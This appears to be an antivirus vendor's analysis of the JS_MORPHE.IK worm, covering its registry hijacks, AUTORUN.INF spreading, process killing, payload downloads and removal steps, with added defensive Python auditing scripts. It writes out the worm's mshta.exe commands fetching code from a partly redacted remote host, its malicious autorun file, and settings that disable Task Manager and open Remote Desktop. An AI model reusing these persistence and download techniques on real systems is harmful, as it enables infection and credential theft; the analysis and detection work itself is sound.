JS_MORPHE.IK
Platform: Windows 2000, Windows XP, Windows Server 2003
Threat Type: Worm
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be hosted on a website and run when a user accesses the said website.
It adds certain registry entries to disable the Task Manager. This action prevents users from terminating the malware process, which can usually be done via the Task Manager.
It drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.
TECHNICAL DETAILS
Arrival Details
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It may be hosted on a website and run when a user accesses the said website.
Installation
This worm drops and executes the following files:
- %Desktop%\msn\d.tpl - same detection name
- %Desktop%\msn\d.reg - detected as REG_MORPHE.A
(Note: %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.)
Autostart Technique
This worm adds the following registry entries so that it is re-executed whenever the user opens a WinRAR archive or uses the added "DOSAqui" context-menu verb on a folder or drive (the verb labels are Spanish for "Open Folder" and "Open Disk Drive"). Each entry runs mshta.exe against an HTA fetched from the remote server, so the payload is pulled down again at every trigger rather than read from a local copy. The WinRAR value replaces WinRAR's own open command; %1 is the archive the user opened:
HKEY_CLASSES_ROOT\WinRAR\shell\
open\command
{default} = ""%System%\mshta.exe" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1""
HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui
{default} = "Abrir Carpeta"
HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui
{default} = "Abrir Unidad de Disco"
HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
Other System Modifications
This worm adds the following registry entries as part of its installation routine:
HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Start Page = "http://mail-live.no-ip.info"
HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Window Title = "::M0rPheU$:: v2.1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = "0"
(Setting fDenyTSConnections to 0 enables incoming Remote Desktop connections to the affected machine; the Internet Explorer entries replace the user's start page and the browser's title bar text.)
It adds the following registry entries to disable the Task Manager:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = "1"
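The registry changes above leave a recognisable pattern: shell verbs whose command hands a remote URL to mshta.exe, Task Manager disabled by policy, and Remote Desktop switched on. The script below is an added example for this page (not Trend Micro's tooling) that audits a REGEDIT5-style .reg export for exactly those patterns; the export it runs on is constructed from the entries documented above, plus one benign shell verb to show what is not flagged.

```python
"""Audit a REGEDIT5-style .reg export for the shell-verb hijacks and policy
changes listed above. Added example for this page, not Trend Micro's tooling;
the export below is constructed from the entries the page documents, plus one
benign shell verb to show what is not flagged."""
import re

# Constructed sample export. Paths and data follow the registry entries on this page.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\WinRAR\shell\open\command]
@="\"%System%\\mshta.exe\" \"http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1\""

[HKEY_CLASSES_ROOT\Directory\shell\DOSAqui]
@="Abrir Carpeta"

[HKEY_CLASSES_ROOT\Directory\shell\DOSAqui\Command]
@="mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"

[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
@="cmd.exe /s /k pushd \"%V\""

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://mail-live.no-ip.info"
"Window Title"="::M0rPheU$:: v2.1"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
'''

SCRIPT_HOST = re.compile(r'\b(mshta|wscript|cscript|powershell|rundll32)(\.exe)?\b', re.I)
REMOTE_URL = re.compile(r'https?://', re.I)
VALUE_LINE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def unescape(s):
    # .reg string data escapes backslash and double quote with a backslash
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text):
    """Return {key: {value_name: data}}; handles string and dword data,
    which is all these entries use. The default value is named '(default)'."""
    keys, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';') or line.startswith('Windows Registry Editor'):
            continue
        if line.startswith('[') and line.endswith(']'):
            cur = line[1:-1]
            keys.setdefault(cur, {})
            continue
        m = VALUE_LINE.match(line) if cur else None
        if not m:
            continue
        name = '(default)' if m.group(1) == '@' else unescape(m.group(2))
        data = m.group(3).strip()
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[cur][name] = unescape(data[1:-1])
        elif data.lower().startswith('dword:'):
            keys[cur][name] = int(data[6:], 16)
        else:
            keys[cur][name] = data
    return keys


def audit(keys):
    """Return (severity, key, name, data, reason) tuples for the patterns on this page."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        for name, data in values.items():
            n = name.lower()
            if '\\shell\\' in k and k.endswith('\\command') and isinstance(data, str):
                # a shell verb that hands a remote URL to a script host is a hijack, not a normal verb
                if SCRIPT_HOST.search(data) and REMOTE_URL.search(data):
                    findings.append(('high', key, name, data, 'shell verb runs a script host against a remote URL'))
            elif k.endswith('\\policies\\system') and n == 'disabletaskmgr' and data == 1:
                findings.append(('medium', key, name, data, 'Task Manager disabled by policy'))
            elif k.endswith('\\terminal server') and n == 'fdenytsconnections' and data == 0:
                findings.append(('medium', key, name, data, 'incoming Remote Desktop connections enabled'))
            elif k.endswith('internet explorer\\main') and n in ('start page', 'window title'):
                findings.append(('info', key, name, data, 'browser setting changed; compare with the expected value'))
    return findings


if __name__ == '__main__':
    for sev, key, name, data, why in audit(parse_reg(SAMPLE_REG)):
        print(f'[{sev}] {key} :: {name} = {data!r}  ({why})')
```

To use it on a live machine, export the hives with `reg export HKCR hkcr.reg` (and the HKCU and HKLM keys above) and feed the file to parse_reg; the benign cmd verb in the sample stays silent because it neither names a script host nor carries a URL.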
Propagation
This worm drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.
The said .INF file contains the following strings (the action and shell\open labels are Spanish for "Open folder to view files", the same wording Windows shows for a drive, so the forged verb looks like the normal folder action while it runs inf.exe):
[autorun]
open="inf.exe"
icon="%SystemRoot%\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command="inf.exe"
shell\open\default=^1
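When triaging removable media it helps to know exactly what an AUTORUN.INF would launch rather than eyeballing it. The parser below is an added example for this page (not Trend Micro's tooling): it reads the file, lists every directive that executes code when the drive is opened, and flags verb labels that mimic Explorer's own folder text. The first sample is constructed from the strings listed above; the second is a constructed benign disc autorun for contrast.

```python
"""Parse an AUTORUN.INF and report what it would launch. Added example for this
page, not Trend Micro's tooling. The first sample below is constructed from the
strings listed under Propagation; the second is a benign disc autorun for contrast."""

# Constructed from the strings this page lists for the dropped AUTORUN.INF.
WORM_AUTORUN = r'''[autorun]
open="inf.exe"
icon="%SystemRoot%\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command="inf.exe"
shell\open\default=^1
'''

# Constructed benign example: a label and an icon only, nothing is executed.
BENIGN_AUTORUN = '''[AutoRun]
label=Product Disc
icon=setup.exe,0
'''

LAUNCH_KEYS = ('open', 'shellexecute')


def parse_ini(text):
    """Minimal INI reader: {section: {key: value}} with case-folded names, values left as written."""
    sections, cur = {}, None
    for raw in text.lstrip('\ufeff').splitlines():
        line = raw.strip()
        if not line or line[0] in ';#':
            continue
        if line.startswith('[') and line.endswith(']'):
            cur = line[1:-1].strip().lower()
            sections.setdefault(cur, {})
        elif cur is not None and '=' in line:
            k, v = line.split('=', 1)
            sections[cur][k.strip().lower()] = v.strip()
    return sections


def first_token(cmd):
    """Program name from a command line: a quoted path, or the first whitespace-delimited token."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split()[0] if cmd else ''


def launch_targets(text):
    """(key, program) for every directive that causes code to run when the drive is opened."""
    auto = parse_ini(text).get('autorun', {})
    out = []
    for k, v in auto.items():
        if k in LAUNCH_KEYS or (k.startswith('shell\\') and k.endswith('\\command')):
            out.append((k, first_token(v)))
    return out


def assess(text):
    """Summarise the file: executables it launches and the verb labels it shows the user."""
    auto = parse_ini(text).get('autorun', {})
    targets = launch_targets(text)
    labels = {k: v for k, v in auto.items()
              if k == 'action' or (k.startswith('shell\\') and k.count('\\') == 1)}
    return {
        'executables': sorted({p for _, p in targets}),
        'verb_labels': labels,
        'suspicious': bool(targets),
        # a label that copies Explorer's "Open folder to view files" text (here in Spanish) is a social-engineering tell
        'folder_masquerade': any('abrir carpeta' in v.lower() or 'open folder' in v.lower()
                                 for v in labels.values()),
    }


if __name__ == '__main__':
    for name, sample in (('worm', WORM_AUTORUN), ('benign', BENIGN_AUTORUN)):
        print(name, assess(sample))
```

Point assess() at the contents of each drive-root AUTORUN.INF; any file whose executables list is non-empty on a USB stick deserves a look, and the inf.exe named here is the TSPY_SPYEKS.C dropper listed under NOTES below.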
Process Termination
This worm terminates the following processes if found running in the affected system's memory:
- avgnt.exe
- avguard.exe
- avshadow.exe
- chrome.exe
- firefox.exe
- GoogleUpdate.exe
- msnmsgr.exe
- GoogleCrashHandler.exe
- mailpv.exe
(avgnt.exe, avguard.exe and avshadow.exe belong to Avira antivirus; msnmsgr.exe is Windows Live Messenger, whose shortcuts the worm replaces below; mailpv.exe is the copy of the Mail PassView password recovery tool, detected as HKTL_MAILPASSVIE, that the worm itself downloads and runs.)
Dropping Routine
This worm drops the following files:
- %User Profile%\Datos de programa\Microsoft\Internet Explorer\Quick Launch\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %Desktop%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Desktop\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
- %User Startup%\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
- %User Startup%\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
- %StartMenu%\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %StartMenu%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %User Profile%\Recent\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
(Note: %User Profile% is the current user's profile folder, which is usually C:\Windows\Profiles\{user name} on Windows 98 and ME, C:\WINNT\Profiles\{user name} on Windows NT, and C:\Documents and Settings\{user name} on Windows 2000, XP, and Server 2003. %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003. %System Root% is the root folder, which is usually C:\. It is also where the operating system is located. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, and C:\Documents and Settings\{User name}\Start Menu\Programs\Startup on Windows 2000, XP, and Server 2003. The Spanish folder and file names, such as Datos de programa for Application Data, Actualizaciones de Windows Live for Windows Live Updates and Detector de Spywares de Windows Live for Windows Live Spyware Detector, indicate that the worm targets Spanish-locale installations.)
Download Routine
This worm connects to the following website(s) to download and execute a malicious file:
- http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msn/msn.js
NOTES:
This worm drops the following files in all physical and removable drives found in the affected system:
- inf.exe - detected as TSPY_SPYEKS.C
- Windows Live Messenger.lnk - detected as LNK_MORPHE.III
It searches for subfolders in the following folders then drops a shortcut link as {folder name}.lnk:
- {drive letter}
- %Desktop%
- %User Profile%\My Documents
- %Start Menu%
- %Start Menu%\Programs
- %Start Menu%\Programas
It sets the Hidden attribute on the folders it finds so that they appear to have been deleted; only the dropped {folder name}.lnk shortcuts remain visible, and a user who opens one of them to reach the "missing" folder runs the worm instead. The dropped shortcut links are detected as LNK_MORPHE.III.
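The decoy pattern just described, a shortcut named after a folder sitting beside that now-hidden folder, is easy to enumerate. The script below is an added example for this page (not Trend Micro's tooling): it walks a tree, pairs every X.lnk with a sibling folder X, reports whether the folder carries the Hidden attribute, and can clear that attribute on Windows. The sample tree is constructed in a temporary directory so the demo runs anywhere; the hidden-attribute check itself only means something on Windows.

```python
"""Find the {folder name}.lnk decoys described above: a shortcut sitting next
to a folder of the same name, which the worm hides. Added example for this
page, not Trend Micro's tooling; the sample tree is built in a temporary
directory, so it runs anywhere, while the Hidden attribute is a Windows concept."""
import os
import stat
import tempfile


def is_hidden(entry):
    """Windows Hidden attribute via DirEntry.stat(); elsewhere only a dot prefix counts."""
    st = entry.stat(follow_symlinks=False)
    attrs = getattr(st, 'st_file_attributes', 0)
    return bool(attrs & getattr(stat, 'FILE_ATTRIBUTE_HIDDEN', 0)) or entry.name.startswith('.')


def find_lnk_decoys(root):
    """Return [(lnk_path, folder_path, folder_is_hidden)] for every X.lnk beside a folder X.
    A run of such pairs across a drive root, the desktop or My Documents matches
    the routine described above; a single pair on its own may be legitimate."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        with os.scandir(dirpath) as it:
            entries = {e.name: e for e in it}
        folders = {d.lower(): d for d in dirnames}
        for fn in filenames:
            base, ext = os.path.splitext(fn)
            if ext.lower() == '.lnk' and base.lower() in folders:
                folder = entries[folders[base.lower()]]
                found.append((os.path.join(dirpath, fn), folder.path, is_hidden(folder)))
    return found


def unhide(path):
    """Clear the Hidden attribute (Windows only); returns True when it was changed."""
    if os.name != 'nt':
        return False
    import ctypes
    attrs = ctypes.windll.kernel32.GetFileAttributesW(path)
    if attrs == -1 or not attrs & stat.FILE_ATTRIBUTE_HIDDEN:
        return False
    return bool(ctypes.windll.kernel32.SetFileAttributesW(path, attrs & ~stat.FILE_ATTRIBUTE_HIDDEN))


def build_sample_tree(base):
    """Constructed layout: two decoy shortcuts at the top level, one nested, one ordinary shortcut."""
    for name in ('Documents', 'Photos', 'Work'):
        os.mkdir(os.path.join(base, name))
    for name in ('Documents.lnk', 'Photos.lnk', 'Readme.lnk'):
        with open(os.path.join(base, name), 'wb') as f:
            f.write(b'L\x00\x00\x00')  # placeholder bytes, not a real shortcut
    os.mkdir(os.path.join(base, 'Work', 'Reports'))
    open(os.path.join(base, 'Work', 'Reports.lnk'), 'wb').close()


def run_demo():
    """Build the sample tree and return the decoys found, as slash-separated paths relative to its root."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted(os.path.relpath(lnk, tmp).replace(os.sep, '/')
                      for lnk, _, _ in find_lnk_decoys(tmp))


if __name__ == '__main__':
    print(run_demo())
```

On an infected machine run find_lnk_decoys() against each drive root and the folders listed above, delete the shortcuts it returns only after confirming they are detected as LNK_MORPHE.III, and call unhide() on the paired folders; Readme.lnk in the sample is left alone because no folder named Readme sits beside it.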
It creates a duplicate copy of the following files with a different file name:
- %Desktop%\msn\m2011.tt copied as %Desktop%\msn\m2011.exe
- %Desktop%\msn\mailpv.tt copied as %Desktop%\msn\mailpv.exe
It then executes the copied files, so their own malicious routines (the TSPY_SPYEKS.C spyware and the Mail PassView password recovery tool) run on the affected system.
This worm connects to the following URLs to download its components and renames them before storing in the affected system:
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\inf.tt - detected as TSPY_SPYEKS.C
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailer.js - saved as %Desktop%\msn\mailer.tpl - detected as JS_MAILER.AC
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailpv.js - saved as %Desktop%\msn\mailpv.tt - detected as HKTL_MAILPASSVIE
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\m2011.tt - detected as TSPY_SPYEKS.C
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/morph.jpg - saved as %Desktop%\msn\M0rPheU$_Esta_Aqui.jpg
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/MA.tt - saved as %Desktop%\msn\Mejores Amigos.zip - detected as LNK_MORPHEUS.VTG
It sends a ping command to the following IP addresses:
- {BLOCKED}.{BLOCKED}.179.157
- {BLOCKED}.{BLOCKED}.221.201
It changes the attribute of the folder %Desktop%\msn to Hidden.
SOLUTION
Step 1
For Windows XP and Windows Server 2003 users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.
Step 2
Close all opened browser windows
Step 3
Remove malware files dropped/downloaded by JS_MORPHE.IK
- REG_SCRDL.A
- TSPY_SPYEKS.C
- LNK_MORPHE.III
- JS_MAILER.AC
- HKTL_MAILPASSVIE
- LNK_MORPHEUS.VTG
Step 4
Restart in Safe Mode
Step 5
Delete these registry values
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.
- In HKEY_CLASSES_ROOT\WinRAR\shell\open\command
- {default} = ""%System%\mshta.exe" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1""
- In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui
- {default} = "Abrir Carpeta"
- In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui\Command
- {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
- In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui
- {default} = "Abrir Unidad de Disco"
- In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui\Command
- {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
- In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
- Start Page = "http://mail-live.no-ip.info"
- In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
- Window Title = "::M0rPheU$:: v2.1"
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
- fDenyTSConnections = "0"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableTaskMgr = "1"
Note: the WinRAR value overwrites WinRAR's own open command, so after removing it repair or reinstall WinRAR to restore archive opening. fDenyTSConnections = 0 turns Remote Desktop on; if Remote Desktop was not in use on this machine, set the value back to 1 rather than only deleting it. The Internet Explorer Start Page can be set back to the user's preferred page instead of being deleted.
Step 6
Search and delete AUTORUN.INF files created by JS_MORPHE.IK that contain the strings listed under Propagation above (open="inf.exe" and shell\open\command="inf.exe"), checking the root of every fixed and removable drive.
Step 7
Restart in normal mode and scan your computer with your Trend Micro product for files detected as JS_MORPHE.IK. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.